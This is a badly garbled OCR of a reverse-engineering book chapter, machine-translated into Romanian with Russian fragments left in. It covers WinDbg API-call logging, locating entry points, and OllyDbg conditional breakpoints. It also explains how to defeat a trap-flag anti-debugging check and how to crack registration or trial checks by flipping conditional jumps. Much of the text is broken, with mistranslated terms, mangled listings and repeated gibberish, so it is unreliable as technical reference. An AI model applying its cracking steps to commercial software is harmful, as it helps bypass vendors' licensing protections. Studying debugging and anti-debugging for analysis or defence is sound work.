dl,[ecx] SVMBOL N ME: « n - MODULE Nfil'E : W n imrge nrme:„i n sys debug flr imrge tim: Str nr KB IVIISKET IV: xdl w n - iFoiiWio: MachineWner KD> D el f el f el f f Fe C F F C FF FF FF FF FF FF FF FF FF FF FF FF FF ff Versiunea consolei de WINDBG-I KD RPC-Calls (apeluri de procedură la distanță sau apeluri de apel ladistanță) este o bază dăunătoare pentru multe servicii de sistem, de exemplu, cum ar fi un serviciu de imprimare SvenShreiber "Capabilitățile Windows nededuse "—P : Peter, GPAVA Discuții extinse despre problemele dedepanare Fig Versiunea grafică a Windbg Windbg exe (Fig ) este o aplicație GUI tipică, conținut cu uncomputer și care vă permite să depanați programele aplicate, să analizați depozitele de memorie, să spionațievenimentele care au loc în sistem Dar pentru depanarea driverelor, va fi din nou necesar un al doilea computer conectatde o rețea sau un cablu Cu toate acestea, vom face fără cablu O mulțime de informații utile sunt conținute în fișierulde referință debugger chm, care este util de citit înainte de a începe lucrul cu debuggerul Capacitățile Windbg suntmult mai largi decât pare la prima vedere Singura problemă este că prin meniu și alte elemente de control al interfețeipur și simplu nu pot ajunge!OK, începem să săpăm adânc Cataloagele W KCHK și W KFRE au extensii pentru Windows ,realizate structural sub formă de biblioteci dinamice Conținutul ambelor cataloage este identic, iar diferența dintreele este că fișierele din directorul *CHK funcționează cu versiunea datoriei nucleului (verificarea construcției) și amodulelor din catalogul *FRE - cu finalul (eliberare) Să vedem ce avem aici (listarea ) Listingu yu Moduli deextensii ale Windbg Vent? Lipsed Windows Directory of C: \ Program Files \ Instrumente de depanare pentru Windows \W KFRE : / / : / / : ACPIKD DLL / / : : GDIKDX DLL / / : KDEX X DLL PARTEA II Tehnicile de bază ale hackerității / / : KDEXTX DLL / / : NDISKD DLL / / : NTSDEXTS DLL / / : RPCEXTS DLL / / : SCSIKD DLL / / : Userexts dll / / : : : În cazuri extreme, puteți încărca un modul de neînțeles în debugger șiputeți apela sistemul său de referință Între timp, ne uităm la catalogul WinXP, care stochează extensii specifice pentruWindows XP (lista ) Listarea Module de expansiune pentru Windbg proiectate pentru directorul Windows XP al C:\ Program Files \ Instrumente de depanare pentru Windows \ WinXP / / : : : ACPICKD DLL : Default TMF : exts dll : KDEXTS DLL / / : MMIPKD DLL / / : MMIPKD DLL : NDISKD DLL : NTSDEXTS DLL / / : RPCEXTS DLL : : : SCSIKD DLL : Sistem TMF / / : TRACEPRT DLL / / : VDMEXTS DLL / / : W CPUEX DLL / / / : W IA XCPUEX DLL : WAMD CPUEX DLL / / : WMITRACE DLL : Wow exts dll Fișier (s) octeți folderi (s) octeți liberi ca înGO, un set de extensii pentru Windows XP este mult mai bogat În ceeace privește extensiile responsabile de spionaj, acestea sunt stocate în catalogul Winext, care este comun tuturorsistemelor (lista ) ■ ■ ■ ■ Listarea L Module de expansiune pentru Suy -Up Directory of C: \ Program Files \ Instrumente de depanare pentruWindows \ Winext : : Ext Dlll Extas : Kext DLL / / : LOGEXTS DLL / / : manifest GPAVA Discuție extinsă a problemelor dedebugging : Uext DLL / / : WDFKD DLL FILE (S) BYTES FOLDER (S) BYTES Fișier gratuit cu un nume care nu se speață LOGEXTS DLL - Acesta este componenta spion Acum, în ceeace privește Windbg în sine Aspectul ferestrelor, culoarea și căștile fonturilor se pot configura în conformitate cugusturile lor, pe care toată lumea, după cum știți, le are diferite Tehnica Ari-Spilation, platforma SDK a inclusinițial o utilitate, care este un fel de ari shpion Această utilitate a fost numită \ Microsoft Platform sdk \ bin \winnt \ apimon exe, cu toate acestea, acest monitor a dat doar o statică comună pentru ari-asuranțe, fără a ține contNotepad (Fig ) Cu alte cuvinte, apimon exe nu era potrivit pentru hacking Să ne uităm la Windbg - ce s -a schimbatîn el?Privind înainte, să spunem - absolut totul!Microsoft ne -a oferit un instrument complex și puternic, care poaterezolva o gamă largă de probleme și să reziste la diverse tehnici anti -deliere cu care sunt umplute mecanisme deprotecție moderne Să începem experimentele În primul rând, încărcăm un fișier în debugger, pentru care vom spiona, deexemplu, toate aceleași notepad Pentru a face acest lucru, selectați File I Open Executable din meniu și selectațiNotepad exe din lista de fișiere Ca opțiune, apăsați combinația de tastatură + și specificați fișierulNotepad exe Printre altele, fișierul poate fi descărcat de pe linia de comandă Partea a II -a Tehnicile de bază alehackingului, nota nu ar trebui să utilizeze butonul barei de instrumente cu imaginea folderului de deschidere - acestlucru nu va ajuta încă Acest buton este conceput pentru a funcționa cu textele originale și cu mediul lor, care ladispoziție, desigur, nu sunt acolo, pentru că, dacă ar fi, nu ar fi nevoie de spionaj Debuggerul încarcă în modascultător fișierul, afișând toate bibliotecile dinamice enumerate în tabelul de import afișează conținutul registrelorși stabilește punctul de oprire la punctul de intrare De fapt, credem că debuggerul a stabilit punctul de oprire înpunctul de intrare, dar, în realitate, acest lucru este complet greșit (lista ) Judecând după adresa f i ch,care este adânc în interiorul ntdll dll, acest lucru nu este deloc punctul de intrare, ci nativul Ari dbgbreakpoint,care poate fi urmărit la nesfârșit, dar nu merge nicăieri Trebuie să ieșiți și să aplicați tot felul de Irosirea detoretelor (ceea ce, totuși, pentru hackeri este destul de tipic) LISTARE L nvvrient Olrienting of theIntre atunci când Zii Loading ■ CommandLine: C: \ Winnt \ Notepad Calea de căutare a simbolurilor este: *** Invalid ****Încărcarea simbolurilor poate fi urâtă fără o cale de căutare a simbolurilor * * Utilizați symfix pentru a facedebuggerul să aleagă o cale de simbol * * După ce setați calea simbolului, utilizați reload pentru a reîmprospătalocațiile simbolului * Notepad exe ntdlll dll c: \ winnt \ system \ comdlg dll c: \ winnt \ system \ shlwapi dllc: \ winnt \ advapi dll c: \ winntm \ kernel winnt \ sys tem \ rpcrt dl C: \ winnt \ system \ gdi dll c: \winnt \ sys tem \ user dll c: \ winnt \ system \ msvcrt dll c: \ winnt \ system dll c: \ winnt \ sys tem \shell dll c: \ winnt \ sys tem \ winspol DRV C:\WINNT\sys tem \MPR DLL exception - code (first chance) f ffd ae ble c c e f f f f el e ce d c d ee Executable Calea de căutare este: Modload: Modload: Modload: Modload: Modload: Modload: Modload:Modload: Modload: Modload: Modload: Modload: Modload: Modload: ( ): Break Instruction EAX = EBX = F ECX = EDX = ESI = FFDF EDI = F EIP = F C ESP = F EBP = FC IPL = NV UP EI PL NZ NC CS = B SS = DS = FS = B GS = , EROARE: Simbol File Cold Not Bid NotGăsește Cold Not Găse Implicit la simboluri de export pentru ntdll dll dbgbreakPoint: f c cc Deci, pentru a găsiun adevărat punct de intrare, încărcăm Notepad exe la un editor Sixte -Core (de exemplu, în Hiew) În continuare, artrebui să mergeți la modul hexadecimal apăsând tasta , apoi apăsați tasta pentru a afișa antetul și pentru amerge la adevăratul punct al intrării pentru a apăsa În acest caz, adresa adevăratului punct de intrare (înexemplul considerat al unui H egal) este afișată în colțul din stânga sus al ecranului (Fig ) Acum ar trebuisă vă întoarceți la Windbg și, în timp ce vă aflați în fereastra de comandă, introduceți comanda BP pentru aseta punctul de oprire pe adevăratul punct al intrării programului Apoi apăsați tasta sau introduceți comanda Go(Goto) și așteptați dezvoltarea evenimentelor Nu va trebui să așteptați mult timp (listarea ) Capitolul Discuții extinse despre problemele de depanare Fig Determinarea adevăratului punct de intrare folosind HiewDeCout Setarea manuală a punctului de oprire pe adevăratul punct de intrare : > VR : > G Modload: E E A C: \ Winmt \ System \ Imm dll Modload: C: \ lvinw \ systerstern \ witichotfillBretll Bretlll Bretlll breat eax = ebx = ffdf ecx = = ES = GS = EFL = Notepad+ x : Pushh ebp Debuggerul încarcă alte două biblioteci dinamice (una dintre care esteWMFHOTFIX DLL - parte a ILFAK ), afișează cu bucurie mesajul că punctul de oprire a funcționat (Punctul de întreruperedespre HIT), afișează valorile registrelor și prima comandă a mașinii, stând la punctul de intrare - Push EBP (veziLista ) Echipa va permite DizAssemb la restul echipelor care o urmăresc, ajutând să ne asigurăm că de data aceastaam ajuns cu adevărat la locul în care a fost necesar (lista ) Ilfac Gilfanov, autorul Dizassembler Ida Pro Partea a II -a Tehnici de hacker de bază Listarea Дизассемблирование окрестностей точки входа : > Unotepad+ x : push ebp bec mov ebp,esp aff pushOxff push x a d push xl d f al mov eax,fs:[ ] push eax MOV FS:[ ], în special, acum că toate măsurile pregătitoare sunt finalizate, trebuie să conectați modulul deexpansiune Pentru a face acest lucru, oferim comanda ILOAD , unde pate este numele modulului de extensie (fără aspecifica extinderea numelui fișierului dll) În acest caz, este necesar să încărcați modulul responsabil pentruspionaj Echipa arată complet așa cum se arată în lista Listarea Încărcarea modulului de expansiuneresponsabil pentru spionajul pentru funcția ARI : > 'LOAD LOGEXTS Debuggerul îl înghite, de parcă nu s -ar fiîntâmplat nimic și se pare că nu se întâmplă evenimente Dar nu este așa!Pentru a ne asigura că modulul de expansiuneeste încărcat cu succes, vom apela sistemul său local de referință prin introducerea comenzii Logexts help (listarea ) Listarea , vizionarea certificatelor ei de comenzi „spion” : > 'logexts help Windows Arai LogingExtensions v ' loge [dir] 'jurnal] [Dir]!Activare logd Director de ieșire opținal Inițializați, dar nu activați loging -ul Dezactivați loging -ul Ieșire:'logo!logo [e | d] [d | t | v] setările de ieșire a listei Activare/Dezactivare ieșire: D - Debugger T - Text File v -Cateșe de jurnal verbose:!Logc 'logc p #! ogc [e | d] *' logc [e | d] #[ #] [ #] acces tampon: 'logb p' logb fModule Includere/excludere:!logm 'logm [ [x] [dll] [dll] Enumerați toate categoriile Enumerați API -urile dincategoria # Activați/dezactivați toate categoriile Activați/dezactivați Categoria # Cuprins tampon prin debugger FlushBuffer la fișierele de jurnal Lista de incluziune/excludere a modulului de afișare Specificați lista deincluziune/excludere a modulului Capitolul Discuții extinse despre depanare Wow!Câte lucruri sunt aici, bune șidiferite!Echipa Loge [DIR] activează spionajul pentru funcțiile ARI, dacă doriți, permițându -vă să indicați uncatalog în care folderul Logexts va fi creat automat pentru stocarea jurnalelor Protocoalele pot fi scrise atât în​​textual, acolo, cât și în format binar (formatul de ieșire este setat de comanda IDOD), iar numele jurnaluluicorespunde numelui fișierului executabil, în spatele căruia debuggerul a spionat (de exemplu , Notepad exe txt-da, astaeste exact pe aceasta este înregistrat de registru) Cauzată fără parametri, comanda iodo afișează formatul de jurnalcurent Pentru a activa formatul textului, este necesar să apelați logo e t și să activați toți cei trei parametri,este necesar să apelați iod de trei ori cu taste diferite Din păcate, designul „iodo e dtvo nu percepe Pentru a reducedimensiunea jurnalului și a elimina informațiile inutile inutile, Windbg acceptă categoriile de apeluri ari, a cărorlistă poate fi afișată pe ecran cu o comandă a IDS (lista ) Listarea Просмотр категорий АРІ-функций : >'Іодс Categories: AdvApi Enabled AtomFunctions Enabled AVIIileExports Enabled Clipboard Enabled ComponentObjectModel Enabled DebuggingAndErrorHandling EnabledDeviceFunctions Enabled Direct D Enabled DirectDraw Enabled DirectPlay Enabled DirectSound Enabled GDI Enabled HandleAndObjectFunctions Activat HookingFunctionsEnabled lofuncții activate MemoryManagementFunc ons Activat MultiMedia Enabled Imprimare activată ProceseSandThreads activate RegistryFunctions Enabled Shell Enabled StringManipulare activat ThreadLocalStorage Enabled User Enabled User StringExports Activat Versiunea WINSOCK Activat StringExports Activat VersiuneCei în total există de categorii și pentru a vizualiza funcțiile incluse înfiecare dintre categorii, puteți utiliza echipa Logic P #, unde # este numărul de categorie, de exemplu, -MemoryManagementFunctions (Leaflet ) Listarea Vizionarea numelor de funcții ari incluse în categoriaMemoryManagementFuncții (Fragment) : > 'IODS r MemoryManagementFunctions: AlocatorUserPhysicalPages Kernel dllFreeuserPages Kernel dlpales dlpaglpages Базовые техники хакерства GetProcessHeap GetProcessHeapsOpenFileMappingA OpenFileMappingW UnmapViewOfFile KERNEL DLL KERNEL DLL KERNEL DLL KERNEL DLL KERNEL DLL Дляшпионажа за определенными категориями функций воспользуйтесь командой ilogc е # # #, где е — включить (enable) шпионаж,а # — перечень Categorii Cheia D (dezactivare), respectiv, exclude categoria indicată (categoria) funcțiilor ARI dincercul suspecților Spionarea nu va fi realizată pentru astfel de funcții Echipa logc e * include în cercul suspecțilortoate categoriile de funcții ari Acesta este principalul mod al spionului în care este condus de hackeri atunci cândprimul cunoștință cu programul de studiu Dacă doriți, puteți specifica o listă de biblioteci dinamice, pentru care saunu ar trebui să spionați Adesea este mult mai ușor decât să te încurci cu categoriile Echipa este afișată de listaactuală a bibliotecilor „supravegheate”!Logm (listarea ) : > 'logm a inclus Module: user dll gdi dlladvapi dll, urmărind această listă, suntem surprinși să constatăm că nu conține kernel dll - biblioteca nucleară debază care conține majoritatea funcțiilor de care suntem interesați O încercare de a o include în listă cu comanda LogmI Kernel dll duce la un mesaj de eroare care vă informează că kernel dll trebuie exclus din listă și nu poate fiobservat (lista ) : > 'logm kernel dll kernel dll este mandatator pentru excludere, astfel încât săpoată' Module incluse: de fapt, trebuie doar să faceți clic pe , ca în jurnal (afișat simultan pe ecran și înfișier), vor apărea nume interceptate ale funcțiilor Ari aparținând kernel dll ) C CEAAFAE GETPROCADDRESS ( x E "GetMomtorlnНо это - не главное - Traduce și valoarea erorii îneroarea Aessage ispabol ( | ) - Returnează SyAbol naae/adresă Trpcheap [-a ] -d ] - DUAPS RPC HEHORV BLOCK Linked Tist 'Pasync • rpcasg țstubasg • authinfo îsecinfo ! Queue! Thread icopacket! Ipcpacket! Transinfo - DUAPS RPC ASVNC STATE - DUAPS RPC Mesaj -DUAPS MIDL STUB MESSAGE - DUAPS CLIENT AUTH INFO - DUAPS RPC SERVER- DUAPS Securitp Furnizor/Package Info - Duaps Sdict - Duaps SDICT - DUAPS QUEUE - DUAPS Thread - Duaps CD pachet -Duaps LRPC pachet - DUAPS trans info 'DGPKT TDGPKTHDR [Opțiune] DGPKTTDGPKTHDR - DUAPS jurnalul de evenimente, adăugați pentru ajutor - DUAPSDG CCALL - DUAPS DG SCAI I - DUAPS DG PACKET ENGINE - DUAPS DG PACKET - DUAPS DG PACKET HEADET (NCA PACKET HEHEHEDER) -DUAPS DG ENDP IN LASYNCASG LASYNCRPC LASYNCDCE - DUAPS NDR ASVNC MESSAGE - DUAPSRPC ASVNC STATE - DUAPS CASYNCHANAGER 'PIPEASG TPIPEDESC йййй> - DUAPS NDR PIPE HESSAGE - DUAPSNDRPIPFDFSC р Загрузка модуля расширения rpcexts Настоятельно рекомендуется изить все эти расширения, за§рая их хоно за д punct иомая хитац с з за заю иоир dejaцац с и иț чнац с и иț чнац с и иț чнац с и иț чнац с и иț чнац с и иțчнац с и иț чнац с и иț чнац с и иț чнацее с и dvs чаiser!Nume Ajutor Но, несмотря ни на что, softice все-такижаль Хороший ыыл отладчик часть ii Основных режимов "стрельбы" вего три - останов при ччении, при за diferițiianА как ыыть, если адрес неизвестен, но ы знаея его содержимое?Или предniu лим, что требуется установить точку останована последовательность машинных команд, liti Aproximativ acest lucru: apelați XXX/Test EAX, EAX/JX Așa cum se va arăta în următoarea parte a acestei cărți,„Identificarea structurilor cheie ale limbilor de nivel înalt”, această secvență corespunde următorului design allimbajului de nivel înalt: if (xxx (,,) == ) Nu mai puțin interesant setați punctul de oprire, iar comanda Call$+ Pop Reg este caracteristică mecanismelor de protecție care utilizează codul de emodificare automată sau se copiazăpe stivă, precum și pe instrucțiunile PushFD, care sunt prezente în Programe auto -instruite și în mecanisme deprotecție anti -canalizare Există și alte șabloane stabile - cu alte cuvinte, secvențe previzibile ale comenzilormașinii localizate în vecinătatea mecanismului de protecție sau chiar în interiorul acestuia Dacă am putea stabili doarpunctul de oprire pe o comandă de mașină dată situată la o adresă arbitrară dar, din păcate, debuggerul are nevoiede o adresă care să ne intereseze nu mai puțin decât ea Privat de suportul hardware din procesor, în formă generală, nuputem rezolva această problemă Cu toate acestea, este prea devreme pentru a vă înscrie în propria impotență Există maimulte tehnici sau mai puțin eficiente care dau un rezultat complet satisfăcător Le vom lua în considerare acum Secreteletractorului de pas cu pas, ollydbg, acceptă punctele condiționate ale opririi, permițând, printre altele, să stabileascăpunctele de oprire pe comenzi (rețineți că Softice nu oferă o astfel de oportunitate) Cum o face ollydbg?Foarte simplu -urmărește programul și la fiecare pas verifică adevărul uneia sau mai multor condiții stabilite de hacker Acesta este unmecanism foarte puternic, cunoscut sub numele de condițiile pentru încetarea urmăririi (condiția de a rula ritm), carevă permite să setați punctele de oprire pe orice combinație de comenzi, registre și/sau date Cu toate acestea, acestmecanism suferă de un număr mare de efecte secundare și restricții În modul de urmărire, viteza programului încetineștede sute de ori, în plus, faptul că urmărirea este foarte ușor de detectat decât mecanismele de protecție și suntangajate Printre numeroasele tehnici anti -canalizare, registrul de pavilion se găsește cel mai adesea cu designulPushFD/Pop Reg cu o verificare ulterioară a batului de urmărire (Flag TRACE, TF) - este cocoșat sau nu DebuggerulMicrosoft Visual Studio Debugger își oferă prezența imediat, dar Ollydbg nu o va cheltui!Dacă, în procesul de urmărire aprogramului, descoperă instrucțiunile PushFD, el curăță urmele după executarea acestuia, ascunzându -și prezența Cutoate acestea, acest truc strică programele instruite de sine În plus, există și alte tehnici anti -canalizare cu careOllydbg nu face față, astfel încât codul de protecție trebuie să fie neutralizat manual, iar pentru aceasta este necesarsă se poată pune puncte de oprire pe anumite combinații de comenzi ale mașinii Nu există atât de multe tehnici anti-canalizare, ci sunt bine cunoscute atât de hackeri, cât și de dezvoltatori Prin urmare, dacă doar dezvoltatorii nuinventează ceva nou fundamental (ceea ce este puțin probabil), hackerii vor putea învinge cu ușurință orice protecție,indiferent cât de dificile și vicleni ar fi Capitolul Discuții extinse despre problemele de depanare Stabilireapunctului de oprire pe o echipă separată, vom începe cu una simplă Luați un exemplu demonstrativ de tf exe și încercațisă setați punctul de oprire pe echipa PushFD Încărcăm programul la debugger, în meniul Debug, selectăm comanda SetCondition sau faceți clic pe Combinația de tastatură + Pe ecran apare o condiție frumoasă pentru a rula ritmulde dialog de rulare la aceasta (eir este în rază de acțiune) În plus, oprirea unei anumite condiții (condiția esteadevărată) sau implementarea unuia dintre predeterminarea (comanda este una a) este acceptată Doar avem nevoie deea!Pentru a seta punctul de întrerupere pe comanda PushFD, selectați comanda este una dintre, accesați fereastra deeditare și introduceți comanda dorită, apoi apăsați butonul OK Caseta de dialog dispare și ne întoarcem la Ollydbg Dacăacum apăsați tasta (run), atunci nimic nu va funcționa, deoarece punctele condiționate ale lucrărilor de opriredoar în modul de urmărire Prin urmare, ar trebui să apăsați combinația de tastatură + (depanare |urmă) Ecranul de debugger rămâne neschimbat și, la prima vedere, se pare că nu se întâmplă nimic Cu toate acestea,aruncați o privire mai atentă - în colțul din dreapta jos al liniei de stare apare inscripția TGASIPD (Fig ),confirmând că urmărirea este în plină desfășurare și încarcă puternic miezul sistemului de operare Orez Condiția dea rula în ritm trace ollydbg debugger vă permite să setați punctele de întrerupere la comenzile arbitrare de mașinăFig Șirul de stare afișează inscripția TGASIPD care spune că debuggerul se află în Codul sursă al modului al acestui exemplu demonstrativ poate fi găsit pe CD furnizatecu această carte în directorul \ CH \ Src Partea a II -a Tehnici de hacking de bază (Kernel TimesKernel Times) Fig În modul de urmărire, Ollydbg încarcă puternic miezul sistemului de operare deorez Urmărirea animată în ollydbg (în colțul din dreapta jos al liniei de stare afișează linia anima ting)Capitolul Discuție extinsă a problemelor de depanare dacă apăsați + + (această combinație detastatură este cauzată de „Dispeceratul de sarcini”), apoi vom vedea că nivelul de încărcare a nucleului corespunzătorcitirilor din Times Kernel (Fig ) semnalează un nivel neobișnuit de ridicat de activitate al debuggerului Dacăcurba corespunzătoare nu este afișată, selectați opțiunea Show Kernel Times (ieșirea nucleului) din meniulVizualizare Dacă în loc de + , apăsați combinația de + (animă în), atunci viteza de urmărire vascădea de zece ori, dar Ollydbg va actualiza fereastra CPU la fiecare pas, iluminând curentul curent Comanda executabilăde către curs (Fig ) Arată foarte frumos (este deosebit de interesant de observat ciclurile), dar pentru muncapractică, acest mod, din păcate, nu este potrivit Puteți întrerupe trasatorul (atât animat, cât și obișnuit) în oricemoment apăsând tasta , în timp ce debuggerul se va opri la ultimele instrucțiuni efectuate Dacă urmăriți până lacapătul victorios, atunci după ceva timp (care depinde în primul rând de puterea procesorului dvs ), debuggerul se vaopri la instrucțiunile pushfd (Fig ) Aceasta este „inima” mecanismului de protecție pe care trebuie să -l analizămși să ne neutralizăm Codul anti -landing este extrem de simplu și este pus în doar patru linii (lista ) Orez Opriți un debugger pentru un răspuns al unui punct de oprire la PushFD E I C F I I I PUSHHFD ROR EAH și EAH, JNZ TF A PUSHFD PUSHFD și dreapta Este înEAX, verificând bitul de urmărire pentru funcționarea logică și EAH IOOH Nu se va dovedi doar un caz de luptă în stivă,deoarece Ollydbg îl va elimina automat Cu toate acestea, pentru ca programul să funcționeze în cadrul altor debuggeri,este necesar să se înlocuiască JNZ cu NOP/NOP sau EAX, IO OH ON și EAH, OH Dacă otrăviți ușor programul, vom părăsiprocedura anti -deliere și vom intra în codul mașinii destul de tipic pentru programe de nivel ridicat Acest codfolosește câteva instrucțiuni Test EAX, EAX/JX pentru a verifica valoarea descrisă de funcție (lista ) A| E D FFFFFFF CALL TF F | S Test EAX, EAX | F JE Scurt TF Mai multeinformații despre această problemă pot fi găsite în următoarea parte a acestei cărți, „Identificarea structurilor cheieale limbilor cu nivel înalt” Partea a II -a Tehnicile de bază ale hackingului PUSHTF ;ASCII „Debuggerul nu a fost detectat” E C Apelați TF A D C AdăugațiESP, EV D JMP scurt TF F |> PUSH TF ;ASCII "Debuggerul a fostdetectat!" E D Apelați TF A C C Adăugați esp, Să încercăm să instalăm punctulde oprire pe combinația de comenzi Call XXX \ Test EAX, EAX \ JX Vai, dar nu ni se întâmplă nimic!Condiția de a rulafereastra de urmărire a urmei spune clar că comanda este una dintre (una dintre următoarele comenzi) Aceasta înseamnă cădacă introduceți editarea constului de apeluri;Test EAH, EAH;JCC Const, Debuggerul va locui pe fiecare dintre comenzileenumerate, ceea ce nu este deloc inclus în planurile noastre Dar Ollydbg are sintaxă!Vorbind de sintaxă Debuggerulacceptă șabloane care vă permit să faceți expresii obișnuite simple De exemplu, R denotă orice registru cu scopgeneral pe de biți, iar comanda test R , R nu se oprește de urmărire atunci când efectuați comanda test EAH,EAH;Test EST, EDX, etc RA - Orice registru general -scop, diferit de RB, deci test RA, șablonul RA va locui pe testulEAH, instrucțiunile EAH, dar va trece peste testul EAH, Evos În consecință, testul RA, șablonul RB va rămâne indiferentla instrucțiunile Test EAH, EAH Cuvântul cheie al constului este înlocuiește orice operand direct, de exemplu, Mook RA,Cost, se oprește la Mook AL, H și MOV ESI, H și CALL COST - la orice apel direct al procedurii Expresia JCC consteste în concordanță cu orice tranziție condiționată (dar nu necondiționată!) La adresa directă Cuvintele cheie rămase enumerate în tabel Tabelul Cuvinte cheie acceptate de Ollydbg în expresii utilizate la determinarea punctelorde oprire ale alocării de cuvinte cheie R orice registru pe biți (AL, BL, CL, DL, AH, BH, CH, DH) R orice registrude biți (AX, BX, CX, DX, SP, BP, SI, DI) R Orice registru pe de biți (EAX, Eush, Esh, Edx, ESP, HEB, ESI, EDI)FPU orice registru de însoțire matematică (ST ST ) MMX orice MMX - Înregistrare (MMO: MMO: MMO ) CRX orice registru decontrol (CR : CR ) DRX orice registru debitor (DRO: DR ) Cost orice compensare constantă orice deplasare (echivalentă cuconstantă) JCC orice tranziție condiționată (JE, JC, JNGE ) Setcc oricare dintre instrucțiunile instalării de fundala bytes (sete, setc, setnge ) cmovcc orice transport condiționat (cmove, cmovc, cmovnge ) Toate acestea, desigur,sunt minunate După ce ne -am antrenat puțin, vom putea stabili punctul de oprire pe orice echipă de mașini (cu excepțiaadresatului precum Mem, pe care Ollydbg nu îl acceptă), dar nu avem nevoie de echipe individuale, ci de combinații alemai multor echipe Ce să faci, ce să faci?Capitolul Discuție extinsă a problemelor de depanare Căutare șabloaneîntr -un text dizassemble Faceți clic pe combinația de tastatură + sau selectați comanda Căutare a ferestreiCPU a căutării comandă |Secvența comenzilor Apare caseta de dialog Secvența de găsire a comenzilor (Fig ) Introduceți Call ConstxTest EAX, EAX \ JCC constration în această fereastră, având fiecare comandă pe noua linie,apoi faceți clic pe butonul Găsiți pentru a căuta secvența specificată de comenzi ale mașinii din textulDizAssembler Ollydbg va găsi foarte repede această secvență, mult mai rapidă decât atunci cândurmăriți Orez Secvența comenzilor găsite de Ollydbg într -un text DizAssemble Acum putem apăsa tasta , setândpunctul de oprire al opririi pe comanda de apel și să continuăm căutarea, punând toate combinațiile detectate Cu unprogram plin de viață al programului sub debugger în (utilizarea modului de urmărire aici este complet opțional),Ollydbg va apărea pe fiecare instrucțiune de apel detectată După aceea, tot ce ne rămâne este să așteptăm aparițiacasetei de dialog cu mesajul despre înregistrarea incorectă, expirată prin perioada de testare absentă din fișierulcheie, etc Aceasta a funcționat înainte de apariția acestei ferestre și, prin urmare, va fi un mecanism de protecțiecare ne otrăvește viața Puteți să -l hack cu inversarea banală a unei tranziții condiționate prin înlocuirea JNZ cu JZ(și JZ cu JNZ) Desigur, această metodă nu va mai trece cu o protecție complexă, dar totuși funcționează destul de des,așa că are sens să o luați în serviciu Optimizarea compilatorilor poate „rupe” șablonul standard, plasat întreinstrucțiunile Test EAX, EAH alte comenzi ale mașinii (lista ) Acest lucru crește productivitatea prin eliminareatimpului de oprire a transportorului, dar complică căutarea șablonului E E V ES E E F APELAȚI TF C C TEST EAH, EAH ECH MOV EWORD PTR, EAX JNZ TF TF TF orice L,permițându -vă să treceți de la zero la p În special, orice este echivalent cu oricare două mașini partea a II-a Tehnicile de bază ale echipelor de hacking, orice echipă de mașini sau absența comenzilor în acest loc Noua versiunea șablonului, ținând cont de caracteristicile optimizării compilatorilor, arată astfel: Call Const \ Test EAX, EAX \orice \ JCC Constance Alegerea corectă a valorii P este foarte importantă Prea multă importanță va duce la lucrărifalse, prea mici - până la trecerea șabloanelor Practica arată că valoarea optimă este de trei Șabloane de programare încoduri de mașină Principalul dezavantaj al căutării pentru + este că Ollydbg caută o combinație de comenzi într-un text dizassembged, iar în programele protejate este aproape întotdeauna ambalat sau criptat Puteți găsi puțin cu ocăutare statică!Prin urmare, este necesar să reveniți la trasatorul de pas cu pas și să vedeți ce alte mecanisme alepunctelor condiționale Ollydbg ne oferă Condiția este adevărata linie vă permite să setați orice condiții al căroradevăr încetează să urmărească Nici șabloane, nici expresii obișnuite nu sunt acceptate aici și toate acestea trebuieprogramate manual, coborând la nivelul codurilor de mașină „goale” Senzații nespuse - par să fii transferat în secolultrecut și să te regăsești în IBM HT, când nu au existat instrumente pregătite pentru hacking Bine, să nu ne bucurăm denostalgie, este mai bine să deschidem ajutorul tehnologiei de conducereelectronică!(http://webpages charter net/danroilins/techhelp/index htm; și fișierul ambalat Technhelp zip poate fi găsitpe multe site -uri de hackeri) sau Ghidul echipei Intel/AMD Matricea Oppod -urilor de instrucțiuni ale mașinii de la Ajutor tehnologic!Prezentat înfig Notă către CD, furnizată împreună cu această carte, veți găsi capitolul „Arta debuggingului mental” din cartea„Carte” pentru programele de depanare fără textele originale ” , care va fi utilă tuturor celor care vor să înțeleagăprincipiile programării în coduri de mașină Mai exact, vom fi interesați de mnemonicele instrucțiunilor Call Const, TestEAX, EAX și JNZ/JZ De acolo, în special, aflăm că echipa de apeluri are un OPCOD E H, urmată de patru octeți ai uneiadrese relative Echipa Test EAH, EAH în forma mașinii arată ca h COH, iar JZ/JNZ sunt reprezentate de instrucțiunibine cunoscute cu două ani de H XXH/ H XXH, unde XXH este o deplasare relativă a adresei de tranziție contorizate dela început a comenzii Orez Matricea Oppodelor comenzilor de mașină din cartea de referință electronică de ajutortehnologic!Chris Kaspersky "Tehnica programelor de depanare fără texte inițiale "—SPB: BHV-PEGERBURG GPAVA Discuții extinse despre problemele de depanare, după ce a rezumat tot ceea ce tocmai s -a spus, puteți face o expresiecare declanșează o secvență dată de echipe Vom construi pe conținutul registrului EIR - dacă este egal cu E H, atunciaceasta este comanda de constituire a apelurilor După ce au crescut EIR cu octeți (lungimea instrucțiunilor de costuride apel), vom primi un indicator la următoarea comandă Următoarea comandă ar trebui să fie afișată cu OPCOD -ulinstrucțiunilor de test EAX, EAX egală cu H COH (C H, ținând cont de ordinea inversă a octetului în procesoarelex ) Rămâne de verificat: este a treia echipă o tranziție convențională sau nu?Creștem EIR cu încă octeți (lungimeainstrucțiunilor test EAX, EAH) și privim: dacă este H sau H, atunci a fost găsită secvența dorită de comenzi!Pentrua „alimenta” acest design la depanare, este necesar să se studieze sintaxa expresiilor liniei condiției este adevărată,descrisă în secțiune File „Evaluarea expresiilor” ollydbg hlp Nu se uită deloc la sintaxa softice, nici la sintaxa S Defapt, este o încrucișare între asamblator și amestecul de Pascal și S Square este stabilit de semnul dublu alegalității (==) și inegalitate - ca în c ('=) Operațiuni logice și sau sunt indicate de operatori singuri & și |(adicănu ca în C) Expresia închisă în paranteze pătrate returnează conținutul celulei de memorie la această adresă, deexemplu, [EAX] În mod implicit, dimensiunea celulei este de patru octeți, iar cuvintele cheie ale octetului, cuvântului,cuvântului și DWORD sunt utilizate pentru a converti tipuri, de exemplu: [byte ESI] == Toate numerele suntinterpretate ca hexadecimal și ar trebui să înceapă cu numere Adică FA - corect, și FA - nu mai este Din păcate,Ollydbg nu emite mesaje de eroare, ceea ce face dificilă depanarea expresiilor Dacă după număr există un punct, acestaeste interpretat ca zecimal, deci expresia (y == ib ) Adevărat Literalele sunt în ghilimele unice („a” == ) și linii -în dublă Expresia ([ESI] = "parolă") devine adevărată atunci când registrul ESI indică parola cu coarde ASCLL(parantezele pătrate sunt opționale și pot fi omise), dacă linia este specificată în Unicode, utilizați cuvântul cheieUnicode, de exemplu : (Unicode [Unicode ESI] == "Parolă") În plus, expresiile aritmetice precum *, +, -, precum șisemne> și + și introduceți această expresie în linia condiției este 